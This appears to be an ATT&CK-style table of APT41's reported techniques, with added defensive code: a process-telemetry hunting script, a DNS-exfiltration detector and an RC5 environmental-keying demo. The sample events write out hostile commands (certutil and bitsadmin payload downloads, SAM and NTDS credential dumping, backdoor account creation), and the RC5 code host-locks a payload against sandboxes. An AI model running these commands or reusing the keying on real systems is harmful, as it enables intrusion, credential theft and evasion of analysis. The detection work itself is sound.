APT41 is a threat group that researchers have assessed to be a Chinese state-sponsored espionage group that also conducts financially motivated operations. Active since at least 2012, APT41 has been observed targeting the healthcare, telecom, technology, and video game industries in 14 countries. APT41 overlaps at least partially with public reporting on groups including BARIUM and Winnti Group.[1][2]
| Domain | ID | Name | Use |
|---|---|---|---|
| Enterprise | T1134 | Access Token Manipulation | During C0017, APT41 used a ConfuserEx-obfuscated BADPOTATO exploit to abuse named-pipe impersonation for local privilege escalation. |
| Enterprise | T1087.001 | Account Discovery: Local Account | APT41 used built-in |
| Enterprise | T1087.002 | Account Discovery: Domain Account | APT41 used built-in |
| Enterprise | T1098 | Account Manipulation | APT41 has added user accounts to the User and Admin groups.[1] |
| Enterprise | T1595.002 | Active Scanning: Vulnerability Scanning | APT41 used the Acunetix SQL injection vulnerability scanner in target reconnaissance operations, as well as the JexBoss tool to identify vulnerabilities in Java applications.[6] |
| Enterprise | T1595.003 | Active Scanning: Wordlist Scanning | APT41 leverages various tools and frameworks to brute-force directories on web servers.[6] |
| Enterprise | T1071.001 | Application Layer Protocol: Web Protocols | APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits.[7] During C0017, APT41 ran |
| Enterprise | T1071.002 | Application Layer Protocol: File Transfer Protocols | APT41 used exploit payloads that initiate download via FTP.[7] |
| Enterprise | T1071.004 | Application Layer Protocol: DNS | |
| Enterprise | T1560.001 | Archive Collected Data: Archive via Utility | APT41 created a RAR archive of targeted files for exfiltration.[1] |
| Enterprise | T1560.003 | Archive Collected Data: Archive via Custom Method | During C0017, APT41 hex-encoded PII data prior to exfiltration.[5] |
| Enterprise | T1197 | BITS Jobs | APT41 used BITSAdmin to download and install payloads.[7][3] |
| Enterprise | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | APT41 created and modified startup files for persistence.[1][2] APT41 added a registry key in |
| Enterprise | T1110.002 | Brute Force: Password Cracking | APT41 performed password brute-force attacks on the local admin account.[1] |
| Enterprise | T1059.001 | Command and Scripting Interpreter: PowerShell | APT41 leveraged PowerShell to deploy malware families in victims' environments.[1][7] |
| Enterprise | T1059.003 | Command and Scripting Interpreter: Windows Command Shell | During C0017, APT41 used |
| Enterprise | T1059.004 | Command and Scripting Interpreter: Unix Shell | APT41 executed |
| Enterprise | T1059.007 | Command and Scripting Interpreter: JavaScript | During C0017, APT41 deployed JScript web shells on compromised systems.[5] |
| Enterprise | T1136.001 | Create Account: Local Account | |
| Enterprise | T1543.003 | Create or Modify System Process: Windows Service | APT41 modified legitimate Windows services to install malware backdoors.[1][2] APT41 created the StorSyncSvc service to provide persistence for Cobalt Strike.[7] |
| Enterprise | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | APT41 used BrowserGhost, a tool designed to obtain credentials from browsers, to retrieve information from password stores.[6] |
| Enterprise | T1486 | Data Encrypted for Impact | APT41 used a ransomware called Encryptor RaaS to encrypt files on the targeted systems and provide a ransom note to the user.[1] |
| Enterprise | T1213.003 | Data from Information Repositories: Code Repositories | APT41 cloned victim user Git repositories during intrusions.[6] |
| Enterprise | T1005 | Data from Local System | APT41 has uploaded files and data from a compromised host.[2] During C0017, APT41 collected information related to compromised machines as well as Personally Identifiable Information (PII) from victim networks.[5] |
| Enterprise | T1001.003 | Data Obfuscation: Protocol Impersonation | During C0017, APT41 frequently configured the URL endpoints of their stealthy passive backdoor LOWKEY.PASSIVE to masquerade as normal web application traffic on an infected server.[5] |
| Enterprise | T1074.001 | Data Staged: Local Data Staging | During C0017, APT41 copied the local |
| Enterprise | T1030 | Data Transfer Size Limits | APT41 transfers post-exploitation files by dividing the payload into fixed-size chunks to evade detection.[6] |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | During C0017, APT41 used the DUSTPAN loader to decrypt embedded payloads.[5] |
| Enterprise | T1568.002 | Dynamic Resolution: Domain Generation Algorithms | |
| Enterprise | T1546.008 | Event Triggered Execution: Accessibility Features | |
| Enterprise | T1480.001 | Execution Guardrails: Environmental Keying | APT41 has encrypted payloads using the Data Protection API (DPAPI), which relies on keys tied to specific user accounts on specific machines. APT41 has also environmentally keyed second-stage malware with an RC5 key derived in part from the infected system's volume serial number.[8] |
| Enterprise | T1048.003 | Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol | During C0017, APT41 exfiltrated victim data via DNS lookups by encoding it and prepending it as subdomains to the attacker-controlled domain.[5] |
| Enterprise | T1041 | Exfiltration Over C2 Channel | During C0017, APT41 used its Cloudflare-proxied C2 channels for data exfiltration.[5] |
| Enterprise | T1567 | Exfiltration Over Web Service | During C0017, APT41 used Cloudflare services for data exfiltration.[5] |
| Enterprise | T1190 | Exploit Public-Facing Application | APT41 exploited CVE-2020-10189, an unsafe deserialization vulnerability in Zoho ManageEngine Desktop Central, and CVE-2019-19781 to compromise Citrix Application Delivery Controller (ADC) and Gateway devices.[7] APT41 leveraged vulnerabilities such as ProxyLogon or SQL injection for initial access.[6] During C0017, APT41 exploited CVE-2021-44207 in the USAHerds application and CVE-2021-44228 in Log4j, as well as other .NET deserialization, SQL injection, and directory traversal vulnerabilities, to gain initial access.[5] |
| Enterprise | T1203 | Exploitation for Client Execution | APT41 leveraged the following exploits in their operations: CVE-2012-0158, CVE-2015-1641, CVE-2017-0199, CVE-2017-11882, and CVE-2019-3396.[1] |
| Enterprise | T1068 | Exploitation for Privilege Escalation | During C0017, APT41 abused named pipe impersonation for privilege escalation.[5] |
| Enterprise | T1133 | External Remote Services | APT41 compromised an online billing/payment service using VPN access between a third-party service provider and the targeted payment service.[1] |
| Enterprise | T1008 | Fallback Channels | APT41 used the Steam community page as a fallback mechanism for C2.[1] |
| Enterprise | T1083 | File and Directory Discovery | APT41 has executed |
| Enterprise | T1589.001 | Gather Victim Identity Information: Credentials | To support initial access, APT41 gained access to databases with information about existing accounts as well as plaintext and hashed passwords.[6] |
| Enterprise | T1589.003 | Gather Victim Identity Information: Employee Names | To support initial access, APT41 gained access to databases with information about existing accounts and lists of employees.[6] |
| Enterprise | T1574.001 | Hijack Execution Flow: DLL Search Order Hijacking | APT41 has used search order hijacking to execute malicious payloads, such as Winnti RAT.[3] |
| Enterprise | T1574.002 | Hijack Execution Flow: DLL Side-Loading | APT41 used legitimate executables to perform DLL side-loading of their malware.[1] |
| Enterprise | T1574.006 | Hijack Execution Flow: Dynamic Linker Hijacking | |
| Enterprise | T1562.006 | Impair Defenses: Indicator Blocking | APT41 developed a custom injector that bypasses Event Tracing for Windows (ETW), so that the malicious process's activity is not reported to ETW-based Windows logging and telemetry.[6] |
| Enterprise | T1070.001 | Indicator Removal: Clear Windows Event Logs | APT41 attempted to remove evidence of some of its activity by clearing the Windows Security and System event logs.[1] |
| Enterprise | T1070.003 | Indicator Removal: Clear Command History | APT41 attempted to remove evidence of some of its activity by deleting Bash histories.[1] |
| Enterprise | T1070.004 | Indicator Removal: File Deletion | |
| Enterprise | T1105 | Ingress Tool Transfer | APT41 used certutil to download additional files.[7][3][2] APT41 downloaded post-exploitation tools such as Cobalt Strike via command shell following initial access.[6] During C0017, APT41 downloaded malicious payloads onto compromised systems.[5] |
| Enterprise | T1056.001 | Input Capture: Keylogging | APT41 used a keylogger called GEARSHIFT on a target system.[1] |
| Enterprise | T1570 | Lateral Tool Transfer | APT41 uses remote shares to move and remotely execute payloads during lateral movement.[6] |
| Enterprise | T1036.004 | Masquerading: Masquerade Task or Service | APT41 has created services to appear as benign system tools.[2] During C0017, APT41 used |
| Enterprise | T1036.005 | Masquerading: Match Legitimate Name or Location | APT41 attempted to masquerade their files as popular anti-virus software.[1][2] During C0017, APT41 used file names beginning with USERS, SYSUSER, and SYSLOG for DEADEYE, and changed KEYPLUG file extensions from .vmp to .upx, likely to avoid hunting detections.[5] |
| Enterprise | T1112 | Modify Registry | APT41 used a malware variant called GOODLUCK to modify the registry in order to steal credentials.[1][2] |
| Enterprise | T1104 | Multi-Stage Channels | APT41 used the storescyncsvc.dll BEACON backdoor to download a secondary backdoor.[7] |
| Enterprise | T1046 | Network Service Discovery | APT41 used a malware variant called WIDETONE to conduct port scans on specified subnets.[1] |
| Enterprise | T1135 | Network Share Discovery | APT41 used the |
| Enterprise | T1027 | Obfuscated Files or Information | APT41 used VMProtect-packed binaries in multiple intrusions.[7] During C0017, APT41 broke malicious binaries, including DEADEYE and KEYPLUG, into multiple sections on disk to evade detection.[5] |
| Enterprise | T1027.002 | Obfuscated Files or Information: Software Packing | APT41 uses packers such as Themida to obfuscate malicious files.[6] During C0017, APT41 used VMProtect to slow the reverse engineering of malicious binaries.[5] |
| Enterprise | T1588.002 | Obtain Capabilities: Tool | APT41 has obtained and used tools such as Mimikatz, pwdump, PowerSploit, and Windows Credential Editor.[1] For C0017, APT41 obtained publicly available tools such as YSoSerial.NET, ConfuserEx, and BadPotato.[5] |
| Enterprise | T1003.001 | OS Credential Dumping: LSASS Memory | APT41 has used hashdump, Mimikatz, and the Windows Credential Editor to dump password hashes from memory and authenticate to other user accounts.[1][2] |
| Enterprise | T1003.002 | OS Credential Dumping: Security Account Manager | APT41 extracted user account data from the Security Account Manager (SAM), making a copy of this database from the registry. During C0017, APT41 copied the |
| Enterprise | T1003.003 | OS Credential Dumping: NTDS | APT41 used ntdsutil to obtain a copy of the victim environment |
| Enterprise | T1069 | Permission Groups Discovery | APT41 used |
| Enterprise | T1566.001 | Phishing: Spearphishing Attachment | APT41 sent spearphishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims.[1] |
| Enterprise | T1542.003 | Pre-OS Boot: Bootkit | APT41 deployed Master Boot Record bootkits on Windows systems to hide their malware and maintain persistence on victim systems.[1] |
| Enterprise | T1055 | Process Injection | APT41 malware TIDYELF loaded the main WINTERLOVE component by injecting it into the iexplore.exe process.[1] |
| Enterprise | T1090 | Proxy | APT41 used a tool called CLASSFON to covertly proxy network communications.[1] During C0017, APT41 used the Cloudflare CDN to proxy C2 traffic.[5] |
| Enterprise | T1012 | Query Registry | APT41 queried registry values to determine items such as configured RDP ports and network configurations.[6] |
| Enterprise | T1021.001 | Remote Services: Remote Desktop Protocol | |
| Enterprise | T1021.002 | Remote Services: SMB/Windows Admin Shares | APT41 has transferred implant files using Windows Admin Shares.[3] |
| Enterprise | T1496 | Resource Hijacking | APT41 deployed a Monero cryptocurrency mining tool in a victim's environment.[1] |
| Enterprise | T1014 | Rootkit | |
| Enterprise | T1053.005 | Scheduled Task/Job: Scheduled Task | APT41 used a compromised account to create a scheduled task on a system.[1][3] During C0017, APT41 used the following Windows scheduled tasks for DEADEYE dropper persistence on US state government networks: |
| Enterprise | T1596.005 | Search Open Technical Databases: Scan Databases | APT41 uses the Chinese website fofa.su, a scan-data search service similar to Shodan, for passive reconnaissance of victims.[6] |
| Enterprise | T1505.003 | Server Software Component: Web Shell | During C0017, APT41 deployed JScript web shells through the creation of malicious ViewState objects.[5] |
| Enterprise | T1553.002 | Subvert Trust Controls: Code Signing | APT41 leveraged code-signing certificates to sign malware when targeting both gaming and non-gaming organizations.[1][2] |
| Enterprise | T1195.002 | Supply Chain Compromise: Compromise Software Supply Chain | APT41 gained access to production environments where they could inject malicious code into legitimate, signed files and widely distribute them to end users.[1] |
| Enterprise | T1218.001 | System Binary Proxy Execution: Compiled HTML File | |
| Enterprise | T1218.011 | System Binary Proxy Execution: Rundll32 | |
| Enterprise | T1082 | System Information Discovery | APT41 uses multiple built-in commands. During C0017, APT41 issued |
| Enterprise | T1016 | System Network Configuration Discovery | APT41 collected MAC addresses from victim machines.[1][2] During C0017, APT41 used |
| Enterprise | T1049 | System Network Connections Discovery | APT41 has enumerated IP addresses of network resources and used the |
| Enterprise | T1033 | System Owner/User Discovery | During C0017, APT41 used |
| Enterprise | T1569.002 | System Services: Service Execution | APT41 used svchost.exe and Net to execute a system service installed to launch a Cobalt Strike BEACON loader.[7][2] |
| Enterprise | T1550.002 | Use Alternate Authentication Material: Pass the Hash | APT41 uses tools such as Mimikatz to enable lateral movement via captured password hashes.[6] |
| Enterprise | T1078 | Valid Accounts | APT41 used compromised credentials to log on to other systems.[1][3] |
| Enterprise | T1102.001 | Web Service: Dead Drop Resolver | APT41 used legitimate websites for C2 through dead drop resolvers (DDR), including GitHub, Pastebin, and Microsoft TechNet.[1] During C0017, APT41 used dead drop resolvers on two separate tech community forums for the Windows version of its KEYPLUG backdoor; notably, APT41 updated the community forum posts frequently with new dead drop resolvers during the campaign.[5] |
| Enterprise | T1047 | Windows Management Instrumentation | APT41 used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence via PowerSploit.[1][2] |
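Several rows above (T1105 certutil downloads, T1197 BITSAdmin, T1003.002 SAM copies from the registry, T1003.003 ntdsutil, T1098/T1136.001 account creation, T1053.005 scheduled tasks) describe living-off-the-land commands that show up verbatim in process-creation telemetry. The hunting script below is an added example, not code from the ATT&CK page or from any APT41 report: it runs regex rules keyed to those technique IDs over constructed Sysmon-style events, marks commands spawned by a web server worker (the pattern behind the web shell rows, T1505.003), and then groups hits per host so that a host showing several of these techniques in sequence stands out. All hostnames, users, IPs, paths and the task name are made up; the rule regexes are this example's own and not a claim about APT41's exact command lines.

```python
import json
import re
from collections import defaultdict

# Constructed process-creation events (JSON lines in the shape of Sysmon Event ID 1).
# Every host, user, address and path here is invented for this example.
SAMPLE_EVENTS = r"""
{"ts": "2022-03-01T02:11:05Z", "host": "WS-104", "user": "CORP\\jdoe", "parent": "explorer.exe", "cmdline": "certutil.exe -hashfile C:\\Users\\jdoe\\setup.msi SHA256"}
{"ts": "2022-03-01T02:14:40Z", "host": "SRV-WEB01", "user": "IIS APPPOOL\\DefaultAppPool", "parent": "w3wp.exe", "cmdline": "cmd.exe /c certutil -urlcache -split -f http://203.0.113.5/up.txt C:\\Windows\\Temp\\up.exe"}
{"ts": "2022-03-01T02:15:02Z", "host": "SRV-WEB01", "user": "IIS APPPOOL\\DefaultAppPool", "parent": "w3wp.exe", "cmdline": "bitsadmin /transfer job1 /download /priority high http://203.0.113.5/b.dll C:\\Windows\\Temp\\b.dll"}
{"ts": "2022-03-01T02:20:17Z", "host": "SRV-WEB01", "user": "NT AUTHORITY\\SYSTEM", "parent": "cmd.exe", "cmdline": "reg save hklm\\sam C:\\Windows\\Temp\\sam.hive"}
{"ts": "2022-03-01T02:21:30Z", "host": "SRV-WEB01", "user": "NT AUTHORITY\\SYSTEM", "parent": "cmd.exe", "cmdline": "net user sysuser P@ssw0rd1 /add"}
{"ts": "2022-03-01T02:21:33Z", "host": "SRV-WEB01", "user": "NT AUTHORITY\\SYSTEM", "parent": "cmd.exe", "cmdline": "net localgroup administrators sysuser /add"}
{"ts": "2022-03-01T02:25:09Z", "host": "SRV-WEB01", "user": "NT AUTHORITY\\SYSTEM", "parent": "cmd.exe", "cmdline": "schtasks /create /tn \\Microsoft\\Windows\\SyncUpdate /tr C:\\Windows\\Temp\\b.dll /sc onlogon /ru SYSTEM"}
{"ts": "2022-03-01T03:02:51Z", "host": "DC01", "user": "CORP\\svc_backup", "parent": "cmd.exe", "cmdline": "ntdsutil \"ac i ntds\" \"ifm\" \"create full C:\\Temp\\x\" q q"}
{"ts": "2022-03-01T08:30:00Z", "host": "WS-104", "user": "CORP\\jdoe", "parent": "cmd.exe", "cmdline": "net user jdoe"}
{"ts": "2022-03-01T08:31:00Z", "host": "WS-104", "user": "CORP\\helpdesk", "parent": "cmd.exe", "cmdline": "bitsadmin /list /allusers"}
"""

# (ATT&CK ID as listed on this page, short label, regex applied to the lowercased command line).
# These patterns are this example's own hunting heuristics, not APT41's exact command lines.
RULES = [
    ("T1105", "certutil download", re.compile(r"certutil(\.exe)?\s.*[-/]urlcache")),
    ("T1197", "bitsadmin transfer", re.compile(r"bitsadmin(\.exe)?\s.*/(transfer|addfile)\b")),
    ("T1003.002", "SAM hive copied via reg save", re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(sam|security|system)\b")),
    ("T1003.003", "NTDS dumped via ntdsutil ifm", re.compile(r"ntdsutil(\.exe)?\s.*\bifm\b")),
    ("T1136.001", "local account created", re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b")),
    ("T1098", "account added to Administrators", re.compile(r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b")),
    ("T1053.005", "scheduled task created", re.compile(r"schtasks(\.exe)?\s.*/create\b")),
]

# Parent images that should not normally spawn shells; a match suggests a web shell.
WEB_SERVER_PARENTS = {"w3wp.exe", "httpd.exe", "php-cgi.exe"}


def load_events(text):
    """Parse JSON-lines telemetry, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_web_parent(parent):
    name = parent.rsplit("\\", 1)[-1].lower()
    return name in WEB_SERVER_PARENTS or name.startswith("tomcat")


def scan(events):
    """Return one hit per (event, matching rule), in telemetry order."""
    hits = []
    for ev in events:
        cmd = ev["cmdline"].lower()
        for tid, label, rx in RULES:
            if rx.search(cmd):
                hits.append({"ts": ev["ts"], "host": ev["host"], "user": ev["user"],
                             "technique": tid, "label": label, "cmdline": ev["cmdline"],
                             "web_parent": is_web_parent(ev["parent"])})
    return hits


def chains(hits, min_techniques=3):
    """Hosts on which at least min_techniques distinct techniques fired: a single
    certutil or net user is often admin noise, three or more in a row rarely is."""
    per_host = defaultdict(set)
    for h in hits:
        per_host[h["host"]].add(h["technique"])
    return {host: sorted(t) for host, t in per_host.items() if len(t) >= min_techniques}


if __name__ == "__main__":
    found = scan(load_events(SAMPLE_EVENTS))
    for h in found:
        flag = " [spawned by web server]" if h["web_parent"] else ""
        print(f'{h["ts"]} {h["host"]:<9} {h["technique"]:<9} {h["label"]}{flag}')
    print("post-exploitation chains:", chains(found))
```

Benign administrative use (`certutil -hashfile`, `bitsadmin /list`, a plain `net user` query) produces no hit, which is the point of matching on the specific switches rather than on the binary name; the per-host chain threshold is the second filter, since a lone `reg save` by a backup operator is not an incident but `certutil` download, SAM copy, account creation and a new scheduled task on one web server within minutes is.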
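The T1048.003 and T1560.003 rows describe the C0017 exfiltration path: victim data is hex-encoded and prepended as subdomain labels to an attacker-controlled domain, so every DNS lookup carries a slice of the data. The detector below is an added example (not from the ATT&CK page or any APT41 tooling) that runs over constructed DNS query-log lines in an assumed `<timestamp> <client> <qtype> <qname>` format. It scores each query name's leading labels for hex- or base32-looking strings, length and entropy, aggregates by client and registered domain so that a single CDN hash-style hostname does not alert, and decodes the hex labels to show the analyst what left the network. The thresholds and the two-label approximation of the registered domain are this example's assumptions.

```python
import math
import re
from collections import defaultdict

# Constructed DNS query log (not real telemetry). The 10.1.4.22 lines carry
# hex-encoded, made-up PII records as subdomains; the 10.1.4.23 lines are benign.
SAMPLE_LOG = """\
2022-03-01T10:00:01Z 10.1.4.22 A www.example.com
2022-03-01T10:00:02Z 10.1.4.22 A 4a6f686e20446f652c3132332d34352d36373839.t1.cdn-sync.example
2022-03-01T10:00:02Z 10.1.4.22 A 4a616e6520526f652c3938372d36352d34333231.t2.cdn-sync.example
2022-03-01T10:00:03Z 10.1.4.22 A 416c6578204b696d2c3535352d34342d33333333.t3.cdn-sync.example
2022-03-01T10:00:03Z 10.1.4.22 A 426f62204c65652c3131312d32322d33333334.t4.cdn-sync.example
2022-03-01T10:00:04Z 10.1.4.22 A 45766520536d6974682c3232322d33332d34343434.t5.cdn-sync.example
2022-03-01T10:00:05Z 10.1.4.23 A login.microsoftonline.com
2022-03-01T10:00:06Z 10.1.4.23 AAAA outlook.office365.com
2022-03-01T10:00:07Z 10.1.4.23 A d41d8cd98f00b204e9800998ecf8427e.dl.cdn-assets.example
"""

HEX_LABEL = re.compile(r"^[0-9a-f]{16,}$")   # hex encoding, as reported for C0017
B32_LABEL = re.compile(r"^[a-z2-7]{20,}$")   # base32 is the other common DNS-safe encoding
REGISTERED_LABELS = 2                        # assumption: last two labels = registered domain


def shannon_entropy(s):
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in (s.count(ch) for ch in set(s)))


def split_name(qname):
    """Return (leading labels, registered domain) for a query name."""
    labels = qname.rstrip(".").lower().split(".")
    return labels[:-REGISTERED_LABELS], ".".join(labels[-REGISTERED_LABELS:])


def label_reasons(prefix):
    """Heuristics that make a subdomain prefix look like encoded data."""
    reasons = []
    data = "".join(prefix)
    if len(data) >= 40:
        reasons.append("long prefix")
    if any(HEX_LABEL.match(l) for l in prefix):
        reasons.append("hex label")
    if any(B32_LABEL.match(l) for l in prefix):
        reasons.append("base32 label")
    if len(data) >= 20 and shannon_entropy(data) > 3.5:
        reasons.append("high entropy")
    return reasons


def try_decode_hex(label):
    """Decode a hex label to text if it yields printable ASCII, else None."""
    try:
        text = bytes.fromhex(label).decode("ascii", errors="replace")
    except ValueError:
        return None
    return text if text.isprintable() else None


def parse_log(text):
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4:
            yield {"ts": parts[0], "client": parts[1], "qtype": parts[2], "qname": parts[3]}


def detect(log_text, min_suspicious=3):
    """Alert when one client sends >= min_suspicious distinct suspicious-looking
    names to the same registered domain; one odd name is usually a CDN hash."""
    groups = defaultdict(list)
    for rec in parse_log(log_text):
        prefix, domain = split_name(rec["qname"])
        reasons = label_reasons(prefix)
        if reasons:
            groups[(rec["client"], domain)].append((rec["qname"], prefix, reasons))
    alerts = []
    for (client, domain), hits in groups.items():
        unique = {q for q, _, _ in hits}
        if len(unique) < min_suspicious:
            continue
        decoded = [d for _, p, _ in hits for d in map(try_decode_hex, p) if d]
        alerts.append({"client": client, "domain": domain, "queries": len(unique),
                       "reasons": sorted({r for _, _, rs in hits for r in rs}),
                       "decoded_samples": decoded[:3]})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(a)
```

Two caveats a practitioner should carry over from this toy: the aggregation threshold is what separates exfiltration from the hex-named objects that CDNs and software updaters legitimately resolve, and the decode step only works because the C0017 encoding was plain hex; an actor who encrypts before encoding leaves only the volume and shape of the queries to alert on.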
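The T1480.001 row says the second stage was keyed with an RC5 key derived in part from the infected system's volume serial number. The consequence for responders is that the stage-two blob recovered from disk is useless without the serial of the original volume, and a sandbox with a different serial will decrypt garbage and never detonate. The block below is an added example, not APT41 code and not the page's: it implements RC5-32/12/16 from the public specification, derives a key from a 32-bit serial using an illustrative SHA-256 construction (an assumption; the actual APT41 derivation is not described on this page), wraps a constructed placeholder payload with an integrity tag, and shows that only the matching serial unwraps it. ECB mode over 8-byte blocks is used to keep the example short and is not a recommendation.

```python
import hashlib
import struct

W, R, B = 32, 12, 16                   # RC5-32/12/16: 32-bit words, 12 rounds, 16-byte key
MASK = (1 << W) - 1
P32, Q32 = 0xB7E15163, 0x9E3779B9      # RC5 magic constants for w = 32


def _rotl(x, y):
    y &= W - 1
    return ((x << y) | (x >> (W - y))) & MASK


def _rotr(x, y):
    y &= W - 1
    return ((x >> y) | (x << (W - y))) & MASK


def rc5_expand_key(key):
    """RC5 key schedule: returns the expanded table S of 2(R+1) words."""
    assert len(key) == B
    t, c = 2 * (R + 1), B // 4
    L = list(struct.unpack("<%dI" % c, key))          # key bytes as little-endian words
    S = [(P32 + i * Q32) & MASK for i in range(t)]
    i = j = A = Bw = 0
    for _ in range(3 * max(t, c)):
        A = S[i] = _rotl((S[i] + A + Bw) & MASK, 3)
        Bw = L[j] = _rotl((L[j] + A + Bw) & MASK, A + Bw)
        i, j = (i + 1) % t, (j + 1) % c
    return S


def rc5_encrypt_block(S, A, Bw):
    A, Bw = (A + S[0]) & MASK, (Bw + S[1]) & MASK
    for i in range(1, R + 1):
        A = (_rotl(A ^ Bw, Bw) + S[2 * i]) & MASK
        Bw = (_rotl(Bw ^ A, A) + S[2 * i + 1]) & MASK
    return A, Bw


def rc5_decrypt_block(S, A, Bw):
    for i in range(R, 0, -1):
        Bw = _rotr((Bw - S[2 * i + 1]) & MASK, A) ^ A
        A = _rotr((A - S[2 * i]) & MASK, Bw) ^ Bw
    return (A - S[0]) & MASK, (Bw - S[1]) & MASK


def derive_key(volume_serial):
    """Illustrative environmental key (assumption, not APT41's scheme): a fixed
    label hashed with the 32-bit volume serial, truncated to the RC5 key size."""
    return hashlib.sha256(b"stage2-key" + volume_serial.to_bytes(4, "little")).digest()[:B]


def _pad(data):                         # PKCS#7 to the 8-byte RC5 block size
    n = 8 - len(data) % 8
    return data + bytes([n]) * n


def _unpad(data):
    n = data[-1]
    if not 1 <= n <= 8 or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def rc5_ecb(S, data, encrypt):
    """ECB over 8-byte blocks; fine for a demo, not for real confidentiality."""
    fn = rc5_encrypt_block if encrypt else rc5_decrypt_block
    out = bytearray()
    for off in range(0, len(data), 8):
        a, b = fn(S, *struct.unpack_from("<II", data, off))
        out += struct.pack("<II", a, b)
    return bytes(out)


def build_stage(volume_serial, payload):
    """Encrypt a payload for one specific host, prefixed with an integrity tag."""
    S = rc5_expand_key(derive_key(volume_serial))
    tag = hashlib.sha256(payload).digest()[:8]
    return rc5_ecb(S, _pad(tag + payload), encrypt=True)


def unpack_stage(volume_serial, blob):
    """Return the payload only if this host's serial reproduces the key; else None."""
    S = rc5_expand_key(derive_key(volume_serial))
    try:
        plain = _unpad(rc5_ecb(S, blob, encrypt=False))
    except ValueError:
        return None
    tag, payload = plain[:8], plain[8:]
    return payload if hashlib.sha256(payload).digest()[:8] == tag else None


if __name__ == "__main__":
    VICTIM_SERIAL = 0x1C2F9A41                         # constructed; real value comes from the victim volume
    stage2 = b"<constructed placeholder for second-stage bytes>"
    blob = build_stage(VICTIM_SERIAL, stage2)
    print("victim host :", unpack_stage(VICTIM_SERIAL, blob))
    print("sandbox host:", unpack_stage(0xDEADBEEF, blob))   # wrong serial -> None
```

On Windows the serial the loader would read is the one `vol C:` prints and `GetVolumeInformationW` returns, so a forensic image of the victim volume is enough to recover the key. Note also why this guardrail is weaker than it looks once you have the blob and the derivation logic: the serial is only 32 bits, and a loader necessarily embeds some check like the tag above, so the keyspace is brute-forceable offline. The implementation is checked against the RC5-32/12/16 zero-key test vector from the specification (ciphertext words 0x21A5DBEE, 0x154B8F6D for all-zero key and plaintext).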